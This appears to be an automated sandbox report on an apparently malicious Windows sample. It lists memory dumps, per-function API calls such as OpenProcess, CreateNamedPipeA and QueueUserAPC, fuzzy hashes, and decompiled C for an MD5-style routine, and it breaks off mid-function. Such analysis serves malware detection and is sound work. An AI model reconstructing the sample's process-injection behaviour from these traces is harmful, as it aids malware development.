0x6e1a1858
0x6e1a1894
0x6e1a1896
0x00000000
0x00000000
0x00000000
0x6e1a184d
0x6e1a1854
0x6e1a185a
0x6e1a185a
0x6e1a185f
0x6e1a186d
0x6e1a1872
0x6e1a1878
0x6e1a187e
0x6e1a1885
0x6e1a1887
0x6e1a1887
0x6e1a1891
0x6e1a1856
0x6e1a1856
0x00000000
0x6e1a1856
0x6e1a1854

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1A15D1), ref: 6E1A1834
GetVersion.KERNEL32 ref: 6E1A1843
GetCurrentProcessId.KERNEL32 ref: 6E1A185F
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1A1878

Strings

@Mt MtTt, xrefs: 6E1A1898

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID: @Mt MtTt
API String ID: 845504543-608512568
Opcode ID: 963aace4e85a119eb5d19cf964510dd1176ebb17394c851d297a5dcfaf327596
Instruction ID: bef23cd7245f939ac76448533a8db20f7fb2fc6dc47eee374a64668a01cd9f6b
Opcode Fuzzy Hash: 963aace4e85a119eb5d19cf964510dd1176ebb17394c851d297a5dcfaf327596
Instruction Fuzzy Hash: E0F08C74644A119FEF408BACA91977D3BA1E717711F20C06AE601C61C4EBB0A0C7BB04

Uniqueness

Uniqueness Score: -1.00%

Function 00B59F02, Relevance: 7.9, APIs: 6, Instructions: 401COMMON

Download Yara Rule

APIs

Part of subcall function 00B61985: memset.NTDLL ref: 00B619A5

Part of subcall function 00B61985: memset.NTDLL ref: 00B61ADA
Part of subcall function 00B61985: memset.NTDLL ref: 00B61AEF

memcpy.NTDLL(?,?,0000011E), ref: 00B59F88
memset.NTDLL ref: 00B59FBE
memset.NTDLL ref: 00B5A00C
memset.NTDLL ref: 00B5A08B
memset.NTDLL ref: 00B5A0FA
memset.NTDLL ref: 00B5A1CA

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: b11faa8856320a32660879f50a38db99a789fb90a476ca06a9075a03f07a8109
Instruction ID: 0eefe13e36f768a19bef3d19866c09b63bcbb83366979a44737fafade410a45b
Opcode Fuzzy Hash: b11faa8856320a32660879f50a38db99a789fb90a476ca06a9075a03f07a8109
Instruction Fuzzy Hash: 92F1D030500B99CFCB318B69C5857AABBF4FF51305F244AEDC9D7A6681D232AA49CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00B53E33, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,00B81248,00000001), ref: 00B53E57
GetLastError.KERNEL32(?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B53EA2

Part of subcall function 00B5B6A7: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,00B78A07), ref: 00B5B6BE
Part of subcall function 00B5B6A7: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 00B5B6D3
Part of subcall function 00B5B6A7: GetLastError.KERNEL32(00000000), ref: 00B5B6DE
Part of subcall function 00B5B6A7: TerminateThread.KERNEL32(00000000,00000000), ref: 00B5B6E8
Part of subcall function 00B5B6A7: CloseHandle.KERNEL32(00000000), ref: 00B5B6EF
Part of subcall function 00B5B6A7: SetLastError.KERNEL32(00000000), ref: 00B5B6F8

GetLastError.KERNEL32(00B598D6,00000000,00000000,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B53E8A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B53E9A

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
Opcode ID: 7106b8e34840e0b28a0f314db6f624a4900929278640a1554b3dcd07599d04ae
Instruction ID: 8d7d037453ebe125e3dc01af7e721667defed39a9a3ce46913ed555e65044849
Opcode Fuzzy Hash: 7106b8e34840e0b28a0f314db6f624a4900929278640a1554b3dcd07599d04ae
Instruction Fuzzy Hash: 18F08171305341AFE3102B689C8EF7766D8EB45776B1005B4FE2AD32E0CB600C4A8B70

Uniqueness

Uniqueness Score: -1.00%

Function 00B5CC12, Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON

Download Yara Rule

APIs

NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 00B5CC26
GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 00B5CC66
RtlNtStatusToDosError.NTDLL(00000000), ref: 00B5CC6F

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Error$InformationLastQueryStatusThread
String ID:
API String ID: 2450163249-0
Opcode ID: 1ae0836c0c56a2071d82df023396ad771c3ac34f2b9e6dde9427682c29b4916b
Instruction ID: abe0869977dfe5fa5280b3dac2756e95bfa61d17d712f61a577726b7199e946d
Opcode Fuzzy Hash: 1ae0836c0c56a2071d82df023396ad771c3ac34f2b9e6dde9427682c29b4916b
Instruction Fuzzy Hash: 9D01EC75500208BFEB119B95DD49EEEBFFEEB84701F1000A5F945D2150EB75D9449B60

Uniqueness

Uniqueness Score: -1.00%

Function 00B5979A, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B597B9
NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 00B597D1

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: InformationProcessQuerymemset
String ID:
API String ID: 2040988606-0
Opcode ID: 44589bc8252a0db27b73bb4a7959d21f0b8e18d31c9081801de046aebb9b3b3d
Instruction ID: 59750d63300f60835c8a8d9ad72939134b4133e7efd7fe51509da33b8794a7d3
Opcode Fuzzy Hash: 44589bc8252a0db27b73bb4a7959d21f0b8e18d31c9081801de046aebb9b3b3d
Instruction Fuzzy Hash: 5FF0FFB6900218AAEB11DB91CC49FDE7BACDB15741F0040A1BE18E6191E770DA58CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B7186D, Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 00B718A5
SetLastError.KERNEL32(00000000), ref: 00B718AC

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: cb658b69bd4a5907885cdd861bbd01a15beba5e459f70840663f8593ff299d9e
Instruction ID: 9740757df0cfaa1d8882228e300a7056e9f3c91092ae675964ea4f69318d5e1c
Opcode Fuzzy Hash: cb658b69bd4a5907885cdd861bbd01a15beba5e459f70840663f8593ff299d9e
Instruction Fuzzy Hash: 24F05E71921308FBEB04CB98DC09FEE76BCEB14345F108048A604A6080EBB4AB04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B9B9, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 00B5B9E6
SetLastError.KERNEL32(00000000,?,00B5702A,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 00B5B9ED

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: a57bc505ba155be6caed5e86bcaf023b86ec3039f10e2181040169d20a24ba47
Instruction ID: c1a9c88df5aba7a2f24a9e90854b57e9728b205d2e94f1961925ded27b13cd90
Opcode Fuzzy Hash: a57bc505ba155be6caed5e86bcaf023b86ec3039f10e2181040169d20a24ba47
Instruction Fuzzy Hash: 23E09A3260525AABCF025FE99C05F9A7BA9EB0D791B008051FF05D3131CB35D965EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B76B6A, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 00B76B97
SetLastError.KERNEL32(00000000,?,00B6F964,?,00000000,00000000,00000004,?,00000000,74E04EE0,00000000), ref: 00B76B9E

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: 43992bc20a1b056279951d8af4063ef2a70134f53190334f1630153066dd624f
Instruction ID: 0284133c02db3fab17090726f374f6ee119dcd2ba7d3a3ab3b8bb047185461f6
Opcode Fuzzy Hash: 43992bc20a1b056279951d8af4063ef2a70134f53190334f1630153066dd624f
Instruction Fuzzy Hash: 3CE01A3221021AABDF025FE89C05E9A7BA9EF49781B008010BE19D2230CB31D960EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B571AA, Relevance: 2.9, APIs: 2, Instructions: 416COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B57584
memset.NTDLL ref: 00B57593

Part of subcall function 00B60AEC: memset.NTDLL ref: 00B60AFD
Part of subcall function 00B60AEC: memset.NTDLL ref: 00B60B09
Part of subcall function 00B60AEC: memset.NTDLL ref: 00B60B34

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: a41cbc875bd3e9d1d5e197d41bb834db8e3483991b27d32af061325aca05bf21
Instruction ID: c09c6a75f50a84bc1346a5ba658f9691e566e00117366bc66c491b63d68cd261
Opcode Fuzzy Hash: a41cbc875bd3e9d1d5e197d41bb834db8e3483991b27d32af061325aca05bf21
Instruction Fuzzy Hash: 15025470645B218FC775CF29D680626BBF1FF547127204EADDAE786A90DA31F889CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00B02B76, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E00B02B76(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x00b02b79
0x00b02b84
0x00b02b87
0x00b02b8a
0x00b02b8b
0x00b02ba9
0x00b02bab
0x00b02bae
0x00b02bb1
0x00b02bb1
0x00b02bb4
0x00b02bb4
0x00b02bb7
0x00b02bb7
0x00b02bba
0x00b02bba
0x00b02bd7
0x00b02bda
0x00b02bf0
0x00b02bf3
0x00b02c0d
0x00b02c10
0x00b02c26
0x00b02c29
0x00b02c2b
0x00b02c43
0x00b02c46
0x00b02c49
0x00b02c61
0x00b02c64
0x00b02c7e
0x00b02c81
0x00b02c97
0x00b02c9a
0x00b02c9c
0x00b02cb4
0x00b02cb9
0x00b02cbc
0x00b02cd2
0x00b02cd5
0x00b02cef
0x00b02cf2
0x00b02d08
0x00b02d0b
0x00b02d0d
0x00b02d28
0x00b02d2b
0x00b02d42
0x00b02d45
0x00b02d49
0x00b02d62
0x00b02d65
0x00b02d67
0x00b02d6a
0x00b02d85
0x00b02d88
0x00b02da1
0x00b02da4
0x00b02db4
0x00b02db7
0x00b02dcf
0x00b02dd2
0x00b02dec
0x00b02def
0x00b02e07
0x00b02e0a
0x00b02e20
0x00b02e23
0x00b02e3b
0x00b02e3e
0x00b02e56
0x00b02e59
0x00b02e73
0x00b02e76
0x00b02e8c
0x00b02e8f
0x00b02ea7
0x00b02eaa
0x00b02ec4
0x00b02ec7
0x00b02edf
0x00b02ee2
0x00b02ef8
0x00b02efb
0x00b02f13
0x00b02f16
0x00b02f2e
0x00b02f31
0x00b02f43
0x00b02f46
0x00b02f58
0x00b02f5b
0x00b02f6d
0x00b02f70
0x00b02f74
0x00b02f84
0x00b02f87
0x00b02f95
0x00b02f98
0x00b02faa
0x00b02fad
0x00b02fc1
0x00b02fc4
0x00b02fc6
0x00b02fd6
0x00b02fd9
0x00b02feb
0x00b02fee
0x00b02ffc
0x00b02fff
0x00b03011
0x00b03014
0x00b03018
0x00b03028
0x00b0302b
0x00b0303d
0x00b03040
0x00b0304e
0x00b03051
0x00b03063
0x00b03066
0x00b03078
0x00b0307b
0x00b0308f
0x00b03092
0x00b030a6
0x00b030a9
0x00b030bd
0x00b030c0
0x00b030d4
0x00b030d7
0x00b030eb
0x00b030ee
0x00b03102
0x00b03107
0x00b03119
0x00b0311c
0x00b03130
0x00b03133
0x00b03147
0x00b0314a
0x00b03160
0x00b03163
0x00b03177
0x00b0317a
0x00b0318c
0x00b0318f
0x00b031a3
0x00b031a6
0x00b031ba
0x00b031bd
0x00b031d1
0x00b031da
0x00b031dd
0x00b031e6
0x00b031ef
0x00b031f7
0x00b031ff
0x00b03209
0x00b0321e

APIs

memset.NTDLL ref: 00B03212

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: c932cbf2a409a87c6291a25323f1d36c96c09ec801fe66f8d437da4467a69dd6
Instruction ID: 48e6ee04c5ade96340301df7bec538e087fcefcb9133928b31e09ab81d729847
Opcode Fuzzy Hash: c932cbf2a409a87c6291a25323f1d36c96c09ec801fe66f8d437da4467a69dd6
Instruction Fuzzy Hash: 5022857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 00B5348B, Relevance: 1.9, APIs: 1, Instructions: 611COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B53B27

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 031630179b2a2c79f4843040c028c1cd25564602e560923fbff3f9db6658e999
Instruction ID: a869543d912469bdec36a76658df5b5209fd1e3870c2443b43eac5eb53526b74
Opcode Fuzzy Hash: 031630179b2a2c79f4843040c028c1cd25564602e560923fbff3f9db6658e999
Instruction Fuzzy Hash: 5A22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 00B5135C, Relevance: 1.8, Strings: 1, Instructions: 575COMMON

Download Yara Rule

Strings

, xrefs: 00B516C5

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 659f02293b28e10c31c8c66836138f2d300ec9977581e8d6a0675cf712352f40
Instruction ID: c74f44827368b46ad677abe8755fa9c3ca8818d899f80983ea2f5679e2bcda7e
Opcode Fuzzy Hash: 659f02293b28e10c31c8c66836138f2d300ec9977581e8d6a0675cf712352f40
Instruction Fuzzy Hash: 79429C74A00B458FCB25CF69C4807AAB7F1FF59305F1889EEC89A97651D774A88ACF10

Uniqueness

Uniqueness Score: -1.00%

Function 00B68D77, Relevance: 1.8, APIs: 1, Instructions: 549COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,00000000,00000000,000000FE,?,?,00000000,?,?,?,?,?,?,00B60C08,?), ref: 00B6911E

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 6bd3426824490771c50e4a3acc94c55f0b44a514aebe3c92bc179377a8ac3ffc
Instruction ID: 6f9ed31bcab7c6c86a9fff0a8fd5379b0d824a4769d37090a26bf0606148f6b6
Opcode Fuzzy Hash: 6bd3426824490771c50e4a3acc94c55f0b44a514aebe3c92bc179377a8ac3ffc
Instruction Fuzzy Hash: 92328C70A00705DFDB24CF69C4946AEB7F2FF55300F248AADD896A7681D738EA85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A23D5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A23D5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
